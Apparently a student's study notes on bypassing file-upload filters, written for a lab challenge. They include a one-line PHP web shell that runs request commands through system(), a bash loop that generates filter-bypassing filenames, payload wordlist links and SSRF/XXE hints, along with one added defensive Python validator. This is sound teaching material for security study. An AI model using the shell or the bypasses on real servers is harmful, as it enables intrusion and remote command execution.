File upload
<FilesMatch ".+\.ph(ar|p|tml)">
SetHandler application/x-httpd-php
</FilesMatch>
The configuration above is how the web server decides which files are allowed to execute PHP code: it is a whitelist expressed as a regex pattern that matches the .phar, .php and .phtml extensions.
wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Miscellaneous/web/content-type.txt
cat content-type.txt | grep 'image/' > image-content-types.txt
PHP extension wordlists:
https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/web-extensions.txt
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Upload%20Insecure%20Files/Extension%20PHP/extensions.lst
Bypassing whitelist and blacklist
// Challenge:
The server employs client-side, blacklist, whitelist, Content-Type,
and MIME-type filters to ensure the uploaded file is an image.
Combine all of the attacks to bypass the filters and upload a PHP file.
SVG XXE: read file
// shell
<?php if(isset($_REQUEST['cmd'])){ $cmd = ($_REQUEST['cmd']); system($cmd); die; }?>
Fuzz Content-Type
// grab the Content-Type wordlist
https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt
wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Miscellaneous/Web/content-type.txt
cat content-type.txt | grep 'image/' > image-content-types.txt
We can write a small bash script that generates all permutations of the file name,
where each of the characters listed in the loop is injected before and after both the PHP and
JPG extensions, as follows:
Code: bash
# each injected character, for each PHP extension, in four positions
for char in '%20' '%0a' '%00' '%0d0a' '/' '.\\' '.' '…' ':'; do
    for ext in '.php' '.phps'; do
        echo "shell$char$ext.jpg" >> wordlist.txt
        echo "shell$ext$char.jpg" >> wordlist.txt
        echo "shell.jpg$char$ext" >> wordlist.txt
        echo "shell.jpg$ext$char" >> wordlist.txt
    done
done
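As an added example (not code from these notes), a server-side name-and-content check in Python that rejects every name the permutation loop above produces. Because the FilesMatch pattern at the top is not anchored with `$`, Apache routes a name containing .php, .phar or .phtml in any position to the PHP handler, so the check inspects every dot-separated segment rather than only the last one; the accepted image types, their magic bytes, and the `check_upload`/`fuzz_names` names are my assumptions.

```python
import re

# Segments that the unanchored FilesMatch ".+\.ph(ar|p|tml)" would hand to PHP,
# plus .phps from the wordlist loop; rejected wherever they appear in the name.
PHP_SEGMENT = re.compile(r"^ph(ar|p|tml|ps)$", re.IGNORECASE)

# Assumed upload policy: only these extensions, and the bytes must match them.
ALLOWED = {"jpg", "jpeg", "png", "gif"}
MAGIC = {"jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff",
         "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8"}

# Plain name, one or more non-empty extensions; no '%', NUL, CR/LF, space,
# '/', '\', ':', '…' or empty segments such as "shell..php".
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]+(\.[A-Za-z0-9]+)+$")


def check_upload(filename, content):
    """Return (accepted, reason) for a client-supplied name and file bytes."""
    # 1. Character whitelist on the raw name: kills every injected character
    #    from the wordlist loop in one step, before any decoding can happen.
    if not SAFE_NAME.fullmatch(filename):
        return False, "disallowed character or malformed name"
    segments = filename.lower().split(".")
    # 2. Every extension segment is checked, mirroring the unanchored pattern.
    for seg in segments[1:]:
        if PHP_SEGMENT.fullmatch(seg):
            return False, "php-handled extension '.%s'" % seg
    # 3. Whitelist the final extension, the one a handler ultimately keys on.
    ext = segments[-1]
    if ext not in ALLOWED:
        return False, "extension '.%s' not allowed" % ext
    # 4. The bytes must really be that image type, regardless of the
    #    Content-Type header the client chose to send.
    if not content.startswith(MAGIC[ext]):
        return False, "magic bytes do not match extension"
    return True, "ok"


def fuzz_names():
    """The same 72 permutations the bash loop above writes to wordlist.txt."""
    names = []
    for char in ["%20", "%0a", "%00", "%0d0a", "/", ".\\", ".", "…", ":"]:
        for ext in [".php", ".phps"]:
            names += ["shell%s%s.jpg" % (char, ext), "shell%s%s.jpg" % (ext, char),
                      "shell.jpg%s%s" % (char, ext), "shell.jpg%s%s" % (ext, char)]
    return names
```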
Extension impact, PDF: SSRF, blind XXE, and HTML injected into the PDF, e.g. <img src=http://10.10.0.1/x?=imgtag>